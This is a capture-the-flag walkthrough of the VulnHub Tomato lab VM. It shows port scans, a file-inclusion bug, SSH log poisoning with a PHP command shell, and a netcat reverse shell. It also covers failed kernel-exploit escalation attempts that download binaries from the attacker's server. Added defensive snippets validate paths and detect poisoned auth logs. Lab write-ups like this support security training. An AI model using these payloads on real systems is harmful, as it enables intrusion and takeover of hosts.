VulnHub-Tomato: 1
Target: https://www.vulnhub.com/entry/tomato-1,557/
Goal: get the root shell, i.e. (root@localhost:~#), and then obtain the flag under /root.
I. Information Gathering
Use arp-scan to discover the target on the local subnet; the target's IP is 192.168.11.137.
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:51:7e:3f, IPv4: 192.168.11.131
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 00:50:56:f3:b5:59 VMware, Inc.
192.168.11.137 00:0c:29:29:d9:2e VMware, Inc.
192.168.11.254 00:50:56:e2:c4:a9 VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 3 responded
Scan the full port range with masscan: four ports are open, 8888, 80, 2211 and 21.
masscan -p0-65535 192.168.11.137
┌──(root㉿kali)-[~]
└─# masscan -p0-65535 192.168.11.137
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2023-04-17 12:22:07 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8888/tcp on 192.168.11.137
Discovered open port 80/tcp on 192.168.11.137
Discovered open port 2211/tcp on 192.168.11.137
Discovered open port 21/tcp on 192.168.11.137
Use nmap to identify the services on the open ports.
nmap -sV -p8888,80,2211,21 192.168.11.137
┌──(root㉿kali)-[~]
└─# nmap -sV -p8888,80,2211,21 192.168.11.137
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 14:43 CST
Nmap scan report for 192.168.11.137
Host is up (0.00043s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
8888/tcp open http nginx 1.10.3 (Ubuntu)
MAC Address: 00:0C:29:29:D9:2E (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.49 seconds
Run dirb against the web server on port 80.
┌──(root㉿kali)-[~]
└─# dirb http://192.168.11.137/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Apr 18 14:30:12 2023
URL_BASE: http://192.168.11.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.11.137/ ----
==> DIRECTORY: http://192.168.11.137/antibot_image/
+ http://192.168.11.137/index.html (CODE:200|SIZE:652)
+ http://192.168.11.137/server-status (CODE:403|SIZE:279)
---- Entering directory: http://192.168.11.137/antibot_image/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Apr 18 14:30:14 2023
DOWNLOADED: 4612 - FOUND: 2
II. Vulnerability Discovery
Browsing to http://192.168.11.137/antibot_image/ shows a directory listing that contains a directory named antibots.
The antibots directory holds a large number of files.
Open http://192.168.11.137/antibot_image/antibots/info.php and press F12 to view the source: it reveals a file inclusion vulnerability in the image parameter, confirmed by requesting:
http://192.168.11.137/antibot_image/antibots/info.php?image=/etc/passwd
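As an added example (not part of the original walkthrough, and not the antibots plugin's own code, whose source the page does not reproduce), this is the check a hardened info.php would apply to its image parameter before including anything. It is written in Python so it runs stand-alone; the same logic maps directly onto PHP's realpath() plus a prefix comparison. The image directory, the photo.jpg file and the escape.jpg symlink are constructed for the demo; the request names are the ones used in this walkthrough plus a traversal and a NUL-byte variant.

```python
import os
import tempfile

# Extensions info.php should be willing to serve from its image directory.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


class UnsafePath(ValueError):
    """Raised when a requested name would resolve outside the image directory."""


def resolve_image_path(base_dir: str, requested: str) -> str:
    """Return the absolute path of `requested` inside base_dir, or raise.

    This is the check a hardened info.php would do before include():
    absolute names, NUL bytes, ../ traversal, symlink escapes and
    non-image extensions are all rejected.
    """
    base = os.path.realpath(base_dir)
    if not requested or "\0" in requested or os.path.isabs(requested):
        raise UnsafePath("absolute or empty name: %r" % requested)
    # realpath collapses '..' segments and follows symlinks, so a symlink
    # inside base that points at /etc/passwd is caught the same way as
    # ../../../etc/passwd.
    candidate = os.path.realpath(os.path.join(base, requested))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("escapes image directory: %r" % requested)
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise UnsafePath("not an image file: %r" % requested)
    if not os.path.isfile(candidate):
        raise UnsafePath("no such image: %r" % requested)
    return candidate


def check(base_dir: str, requested: str) -> str:
    """Summarise the decision as 'ok' or 'rejected: <reason>'."""
    try:
        resolve_image_path(base_dir, requested)
        return "ok"
    except UnsafePath as exc:
        return "rejected: %s" % exc


def build_demo_tree() -> str:
    """Create a constructed stand-in for antibot_image/ with one real image
    and one symlink that escapes the directory (the symlink is skipped on
    filesystems that do not support it; the name is then simply missing)."""
    base = tempfile.mkdtemp(prefix="antibot_image_")
    outside = tempfile.mkdtemp(prefix="outside_")
    with open(os.path.join(base, "photo.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0")  # JPEG magic, enough for a demo
    with open(os.path.join(outside, "secret.txt"), "w") as fh:
        fh.write("not an image\n")
    try:
        os.symlink(os.path.join(outside, "secret.txt"),
                   os.path.join(base, "escape.jpg"))
    except OSError:
        pass
    return base


DEMO_BASE = build_demo_tree()

# Requests modelled on the walkthrough: the legitimate image, the two
# file-inclusion payloads, a traversal variant, the symlink escape and a
# NUL-byte extension trick.
DEMO_REQUESTS = [
    "photo.jpg",
    "/etc/passwd",
    "/var/log/auth.log",
    "../../../../etc/passwd",
    "escape.jpg",
    "photo.jpg\0.php",
]

if __name__ == "__main__":
    for name in DEMO_REQUESTS:
        print("%-28r -> %s" % (name, check(DEMO_BASE, name)))
```

Only photo.jpg is accepted; every other request, including the two URLs used above, is rejected before any file is opened. The realpath step is what matters: a plain string prefix check on the raw request would miss both the symlink and the traversal.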
III. Getting a Shell
Recon showed SSH on port 2211, so the plan is log poisoning: get a PHP shell written into the SSH log, then include that log through the vulnerability.
First confirm that the log file is at the default path and readable through the inclusion:
http://192.168.11.137/antibot_image/antibots/info.php?image=/var/log/auth.log
Connect over SSH using the one-line PHP shell as the username, so that sshd logs it:
ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211
┌──(root㉿kali)-[~]
└─# ssh '<?php system($_GET['cmd']);?>'@192.168.11.137 -p 2211
The authenticity of host '[192.168.11.137]:2211 ([192.168.11.137]:2211)' can't be established.
ED25519 key fingerprint is SHA256:99Mk+oWitdg2e434cvlhvYgeQaMwRs76tgSLrezh9/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.11.137]:2211' (ED25519) to the list of known hosts.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
Permission denied, please try again.
<?php system($_GET[cmd]);?>@192.168.11.137's password:
<?php system($_GET[cmd]);?>@192.168.11.137: Permission denied (publickey,password).
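Added example, not from the original walkthrough: the same poisoning attempt seen from the defender's side. sshd records the attempted username verbatim, which is why a PHP tag in a login name lands in /var/log/auth.log. The script below parses sshd lines, extracts the username and flags the ones that contain PHP or command-execution fragments. The log lines are constructed to mirror the SSH attempt above (timestamps, PIDs and the deploy user are made up). A second check worth making on the server is that the web server user cannot read the log at all: on Ubuntu auth.log is created with mode 0640 and group adm, so a log that www-data can include is itself a finding.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# sshd lines that carry the attempted username. The name is logged
# verbatim, which is what makes log poisoning possible.
USER_PATTERNS = [
    re.compile(r"Invalid user (?P<user>.*?) from (?P<src>\S+)", re.I),
    re.compile(r"Failed password for (?:invalid user )?(?P<user>.*?) from (?P<src>\S+) port \d+", re.I),
]

# Fragments that have no business in a username but are typical of a PHP
# payload. The first matching entry is reported as the reason.
SUSPICIOUS = [
    ("php open tag", re.compile(r"<\?")),
    ("php close tag", re.compile(r"\?>")),
    ("request superglobal", re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)", re.I)),
    ("command execution call", re.compile(r"\b(?:system|exec|passthru|shell_exec|popen|eval)\s*\(", re.I)),
    ("backtick", re.compile(r"`")),
]


@dataclass
class Finding:
    line_no: int
    src: str
    user: str
    reason: str


def extract_user(line: str) -> Optional[Tuple[str, str]]:
    """Return (username, source address) for an sshd auth line, else None."""
    for pat in USER_PATTERNS:
        m = pat.search(line)
        if m:
            return m.group("user"), m.group("src")
    return None


def scan_auth_log(lines: Iterable[str]) -> List[Finding]:
    """Flag every line whose attempted username looks like injected code."""
    findings: List[Finding] = []
    for n, line in enumerate(lines, 1):
        hit = extract_user(line)
        if not hit:
            continue
        user, src = hit
        for reason, pat in SUSPICIOUS:
            if pat.search(user):
                findings.append(Finding(n, src, user, reason))
                break
    return findings


# Constructed sample, modelled on what the SSH attempt in this walkthrough
# leaves in /var/log/auth.log. The last two lines are ordinary noise.
SAMPLE_AUTH_LOG = """\
Apr 18 14:50:01 ubuntu sshd[1321]: Invalid user <?php system($_GET[cmd]);?> from 192.168.11.131
Apr 18 14:50:01 ubuntu sshd[1321]: input_userauth_request: invalid user <?php system($_GET[cmd]);?> [preauth]
Apr 18 14:50:03 ubuntu sshd[1321]: Failed password for invalid user <?php system($_GET[cmd]);?> from 192.168.11.131 port 50404 ssh2
Apr 18 14:52:10 ubuntu sshd[1330]: Failed password for root from 192.168.11.131 port 50410 ssh2
Apr 18 14:53:00 ubuntu sshd[1335]: Accepted password for deploy from 192.168.11.10 port 50420 ssh2
""".splitlines()

if __name__ == "__main__":
    for f in scan_auth_log(SAMPLE_AUTH_LOG):
        print("line %d: %s from %s, username %r" % (f.line_no, f.reason, f.src, f.user))
```

Lines 1 and 3 are flagged with the source address 192.168.11.131; the preauth line has no "from" clause and is skipped, and the two ordinary login lines produce nothing. Feeding the real log through the same function (or the equivalent pattern in a SIEM rule) surfaces the poisoning attempt at the moment it happens, well before the log is ever included.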
Start a listener on Kali:
nc -lvnp 5868
┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
Send the reverse shell command as the cmd parameter through Burp Suite (Ctrl+U URL-encodes the selected text):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.131 5868 >/tmp/f
Upgrade to a full TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
ls
export SHELL=/bin/bash
export TERM=screen
stty rows 33 columns 145
reset
┌──(root㉿kali)-[~]
└─# nc -lvnp 5868
listening on [any] 5868 ...
connect to [192.168.11.131] from (UNKNOWN) [192.168.11.137] 39958
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/antibot_image/antibots$ ^Z
[1]+ 已停止 nc -lvnp 5868
┌──(root㉿kali)-[~]
└─# stty raw -echo
┌──(root㉿kali)-[~]
└─#
nc -lvnp 5868
ls
antibot.php functions language screenshot-1.jpg settings
assets guide license.txt screenshot-2.jpg table
dashboard info.php readme.txt screenshot-3.jpg uninstall.php
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export SHELL=/bin/bash
www-data@ubuntu:/var/www/html/antibot_image/antibots$ export TERM=screen
www-data@ubuntu:/var/www/html/antibot_image/antibots$ stty rows 33 columns 145
www-data@ubuntu:/var/www/html/antibot_image/antibots$ reset
IV. Privilege Escalation (Failed)
Check the Linux kernel version:
uname -a
www-data@ubuntu:/var/www/html/antibot_image/antibots$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
1. A false lead
Search for a usable exploit:
searchsploit 4.4.0-21
Try escalating with 44300.c:
┌──(root㉿kali)-[~]
└─# locate linux_x86-64/local/44300.c
/usr/share/exploitdb/exploits/linux_x86-64/local/44300.c
┌──(root㉿kali)-[~]
└─# cp /usr/share/exploitdb/exploits/linux_x86-64/local/44300.c tomato
┌──(root㉿kali)-[~]
└─# ls -al tomato |grep 44300.c
-rw-r--r-- 1 root root 5959 4月18日 15:29 44300.c
Read the PoC:
cat 44300.c
┌──(root㉿kali)-[~/tomato]
└─# cat 44300.c
/**
EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
Video ~ https://www.youtube.com/watch?v=qchiJn94kTo
**/
/** decr.c **/
/**
* Ubuntu 16.04 local root exploit - netfilter target_offset OOB
* check_compat_entry_size_and_hooks/check_entry
*
* Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c
*
* Vitaly Nikolenko
* vnik@cyseclabs.com
* 23/04/2016
*
*
* ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers
* automatic loading).
*
* vnik@ubuntu:~$ uname -a
* Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
* vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
* vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
* vnik@ubuntu:~$ ./decr
* netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
* [!] Decrementing the refcount. This may take a while...
* [!] Wait for the "Done" message (even if you'll get the prompt back).
* vnik@ubuntu:~$ [+] Done! Now run ./pwn
*
* vnik@ubuntu:~$ ./pwn
* [+] Escalating privs...
* root@ubuntu:~# id
* uid=0(root) gid=0(root) groups=0(root)
* root@ubuntu:~#
*
*/
Download and compile the exploit on Kali:
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
unzip 44300.zip
gcc decr.c -m32 -O2 -o decr
gcc pwn.c -O2 -o pwn
┌──(root㉿kali)-[~/tomato]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
--2023-04-18 15:45:10-- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44300.zip
正在解析主机 gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
正在连接 gitlab.com (gitlab.com)|172.65.251.78|:443... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2575 (2.5K) [application/octet-stream]
正在保存至: “44300.zip”
44300.zip 100%[===================================================================>] 2.51K --.-KB/s 用时 0.01s
2023-04-18 15:45:13 (255 KB/s) - 已保存 “44300.zip” [2575/2575])
┌──(root㉿kali)-[~/tomato]
└─# unzip 44300.zip
Archive: 44300.zip
inflating: pwn.c
inflating: decr.c
┌──(root㉿kali)-[~/tomato]
└─# gcc decr.c -m32 -O2 -o decr
┌──(root㉿kali)-[~/tomato]
└─# gcc pwn.c -O2 -o pwn
┌──(root㉿kali)-[~/tomato]
└─# ls -al
总计 68
drwxr-xr-x 2 root root 4096 4月18日 15:51 .
drwx------ 33 root root 4096 4月18日 15:38 ..
-rw-r--r-- 1 root root 5959 4月18日 15:29 44300.c
-rw-r--r-- 1 root root 2575 4月18日 15:45 44300.zip
-rwxr-xr-x 1 root root 15572 4月18日 15:50 decr
-rw-r--r-- 1 root root 4565 2016年 4月23日 decr.c
-rwxr-xr-x 1 root root 16440 4月18日 15:51 pwn
-rw-rw-r-- 1 root root 1163 2016年 4月23日 pwn.c
Start an HTTP server on Kali:
python3 -m http.server 8000
┌──(root㉿kali)-[~/tomato]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Download the exploit on the target and make it executable:
wget http://192.168.11.131:8000/decr
wget http://192.168.11.131:8000/pwn
chmod 777 decr pwn
www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/decr
--2023-04-18 00:53:59-- http://192.168.11.131:8000/decr
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15572 (15K) [application/octet-stream]
Saving to: 'decr'
decr 100%[===================================================================>] 15.21K --.-KB/s in 0s
2023-04-18 00:53:59 (586 MB/s) - 'decr' saved [15572/15572]
www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/pwn
--2023-04-18 00:54:09-- http://192.168.11.131:8000/pwn
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16440 (16K) [application/octet-stream]
Saving to: 'pwn'
pwn 100%[===================================================================>] 16.05K --.-KB/s in 0.001s
2023-04-18 00:54:09 (12.9 MB/s) - 'pwn' saved [16440/16440]
www-data@ubuntu:/tmp$ ls -al |grep www-data
-rw-r--r-- 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data 0 Apr 18 00:54 f
-rw-r--r-- 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$ chmod 777 decr pwn
www-data@ubuntu:/tmp$ ls -al |grep www-data
-rwxrwxrwx 1 www-data www-data 15572 Apr 18 00:50 decr
prw-r--r-- 1 www-data www-data 0 Apr 18 00:54 f
-rwxrwxrwx 1 www-data www-data 16440 Apr 18 00:51 pwn
www-data@ubuntu:/tmp$
Run the exploit; privilege escalation fails:
./decr
./pwn
www-data@ubuntu:/tmp$ ./decr
bash: ./decr: No such file or directory
Note: according to reports online, compiling the exploit as 64-bit is enough to get root (a "No such file or directory" error for an executable that exists means the 32-bit loader the -m32 binary depends on is absent on the target):
gcc decr.c -m64 -O2 -o decr
gcc pwn.c -m64 -O2 -o pwn
2. The "real" escalation reported online (also false)
A GitHub search turns up an exploit for CVE-2017-6074 that is said to work on this kernel.
Download and compile it on Kali:
git clone https://github.com/kkamagui/linux-kernel-exploits.git
cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/
┌──(root㉿kali)-[~/tomato]
└─# git clone https://github.com/kkamagui/linux-kernel-exploits.git
正克隆到 'linux-kernel-exploits'...
remote: Enumerating objects: 39, done.
remote: Total 39 (delta 0), reused 0 (delta 0), pack-reused 39
接收对象中: 100% (39/39), 37.83 KiB | 27.00 KiB/s, 完成.
处理 delta 中: 100% (3/3), 完成.
┌──(root㉿kali)-[~/tomato]
└─# cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074/
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 32
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root 37 4月18日 16:08 compile.sh
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ./compile.sh
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# ls -al
总计 56
drwxr-xr-x 2 root root 4096 4月18日 16:39 .
drwxr-xr-x 6 root root 4096 4月18日 16:08 ..
-rwxr-xr-x 1 root root 37 4月18日 16:08 compile.sh
-rwxr-xr-x 1 root root 23096 4月18日 16:39 CVE-2017-6074
-rw-r--r-- 1 root root 16554 4月18日 16:08 CVE-2017-6074.c
Start the HTTP server:
python3 -m http.server 8000
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# pwd
/root/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074
┌──(root㉿kali)-[~/tomato/linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074]
└─# python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Fetch the exploit on the target and make it executable:
wget http://192.168.11.131:8000/CVE-2017-6074
chmod 777 CVE-2017-6074
www-data@ubuntu:/tmp$ wget http://192.168.11.131:8000/CVE-2017-6074
--2023-04-18 01:42:07-- http://192.168.11.131:8000/CVE-2017-6074
Connecting to 192.168.11.131:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 23096 (23K) [application/octet-stream]
Saving to: 'CVE-2017-6074'
CVE-2017-6074 100%[===================================================================>] 22.55K --.-KB/s in 0s
2023-04-18 01:42:07 (877 MB/s) - 'CVE-2017-6074' saved [23096/23096]
www-data@ubuntu:/tmp$ ls -al |grep CVE-2017-6074
-rw-r--r-- 1 www-data www-data 23096 Apr 18 01:39 CVE-2017-6074
www-data@ubuntu:/tmp$ chmod 777 CVE-2017-6074
Run the exploit:
./CVE-2017-6074
www-data@ubuntu:/tmp$ ./CVE-2017-6074
./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./CVE-2017-6074)
3. Resolving the GLIBC version mismatch

Check the target's GLIBC version:
ldd --version

Set up the glibc-all-in-one environment.

Download glibc-all-in-one:
git clone https://github.com/matrix1001/glibc-all-in-one.git

Update the version list:
cd glibc-all-in-one/
python3 update_list

List the installable versions:
cat old_list # check which list file carries the version you need (cat list for current releases)

Build and install patchelf:
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh
./configure
make
make check
make install

Download and configure the specific GLIBC version.

List the available versions:
cat old_list # check the file version (cat list)

Download the 64-bit 2.34 build of GLIBC:
./download_old 2.34-0ubuntu3_amd64 # use ./download instead if the version is in list rather than old_list

Compile (the key step); either of the following two forms works.
Notes:
The GLIBC path must be absolute.
-Wl,--rpath sets the directory that contains ld-linux-x86-64.so.2 (and the matching libc).
-Wl,--dynamic-linker sets the ld-linux-x86-64.so.2 file to embed as the program interpreter.
Both paths are written into the resulting binary unchanged, so the binary only starts on a host where the same absolute path exists.

gcc -Wl,--rpath=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ -Wl,--dynamic-linker=/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so.2 -s CVE-2017-6074.c -o exp

gcc -Wl,-rpath='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/',-dynamic-linker='/root/GLIBC_2.34/glibc-all-in-one/libs/2.34-0ubuntu3_amd64/ld-linux-x86-64.so.2' -s CVE-2017-6074.c -o exp

-Wl,--rpath=[directory containing the ld-linux-x86-64.so.2 of the chosen GLIBC version] # absolute path
-Wl,--dynamic-linker=[the ld-linux-x86-64.so.2 file of the chosen GLIBC version] # absolute path
-s: strip the symbol table from the output; may be omitted
-o: name of the output file; if omitted, gcc writes a.out

Privilege escalation kept failing anyway, which is baffling.
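Added example, not from the original walkthrough: the "GLIBC_2.34' not found" error above is the dynamic loader comparing the symbol versions recorded in the binary's .gnu.version_r section against what the host's libc.so.6 exports. The parser below reads that section from an ELF64 file and reports the highest GLIBC version the binary requires, so a mismatch can be spotted on the build machine instead of on the target. The version to compare against is what ldd --version prints on the target (a stock Ubuntu 16.04 ships glibc 2.23). Nothing here is specific to this box; by default the script inspects the running Python interpreter, and self_check() returns None where that interpreter is not an ELF64 file.

```python
import struct
import sys
from typing import Dict, List, Optional, Tuple

SHT_GNU_VERNEED = 0x6FFFFFFE  # section type of .gnu.version_r


def required_symbol_versions(data: bytes) -> Dict[str, List[str]]:
    """Map each shared library named in .gnu.version_r to the symbol
    versions the binary requires from it, e.g. {'libc.so.6': ['GLIBC_2.34', ...]}.
    Only ELF64 is handled; anything else raises ValueError."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2:  # EI_CLASS: 1 = ELF32, 2 = ELF64
        raise ValueError("only ELF64 is supported")
    end = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little endian
    # ELF64 header: e_shoff, e_shentsize and e_shnum locate the section table.
    hdr = struct.unpack_from(end + "16sHHIQQQIHHHHHH", data, 0)
    shoff, shentsize, shnum = hdr[6], hdr[11], hdr[12]
    sections = [struct.unpack_from(end + "IIQQQQIIQQ", data, shoff + i * shentsize)
                for i in range(shnum)]

    def cstring(strtab_off: int, idx: int) -> str:
        start = strtab_off + idx
        return data[start:data.index(b"\0", start)].decode("ascii", "replace")

    result: Dict[str, List[str]] = {}
    for sh in sections:
        sh_type, sh_offset, sh_link, sh_info = sh[1], sh[4], sh[6], sh[7]
        if sh_type != SHT_GNU_VERNEED:
            continue
        strtab_off = sections[sh_link][4]  # sh_link names the string table
        off = sh_offset
        for _ in range(sh_info):  # sh_info = number of Verneed entries
            _ver, vn_cnt, vn_file, vn_aux, vn_next = struct.unpack_from(end + "HHIII", data, off)
            lib = cstring(strtab_off, vn_file)
            aux = off + vn_aux
            for _ in range(vn_cnt):
                _hash, _flags, _other, vna_name, vna_next = struct.unpack_from(end + "IHHII", data, aux)
                result.setdefault(lib, []).append(cstring(strtab_off, vna_name))
                if vna_next == 0:
                    break
                aux += vna_next
            if vn_next == 0:
                break
            off += vn_next
    return result


def parse_glibc_version(name: str) -> Optional[Tuple[int, ...]]:
    """'GLIBC_2.34' -> (2, 34); names that are not GLIBC versions give None."""
    if not name.startswith("GLIBC_"):
        return None
    try:
        return tuple(int(p) for p in name[len("GLIBC_"):].split("."))
    except ValueError:
        return None


def highest_glibc(versions: Dict[str, List[str]]) -> Optional[Tuple[int, ...]]:
    """The newest GLIBC_x.y the binary needs from libc.so.6, or None."""
    parsed = [v for v in map(parse_glibc_version, versions.get("libc.so.6", [])) if v]
    return max(parsed) if parsed else None


def runs_on(versions: Dict[str, List[str]], target_glibc: str) -> bool:
    """Would the loader accept this binary on a host whose libc version is
    target_glibc (the number printed by `ldd --version`)?"""
    need = highest_glibc(versions)
    have = tuple(int(p) for p in target_glibc.split("."))
    return need is None or need <= have


def self_check() -> Optional[Dict[str, List[str]]]:
    """Parse the running interpreter; None if it is not a readable ELF64 file."""
    try:
        with open(sys.executable, "rb") as fh:
            return required_symbol_versions(fh.read())
    except (OSError, ValueError, IndexError, struct.error):
        return None


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else sys.executable
    with open(path, "rb") as fh:
        needed = required_symbol_versions(fh.read())
    for lib, names in needed.items():
        print(lib, sorted(names))
    print("highest GLIBC required:", highest_glibc(needed))
```

Run it as `python3 elfglibc.py ./exp` (any file name works) and compare the reported version with the target's ldd output: a binary that needs GLIBC_2.34 cannot run against a 2.23 libc no matter how it is transferred or chmod'ed, which is exactly the situation the error message above describes.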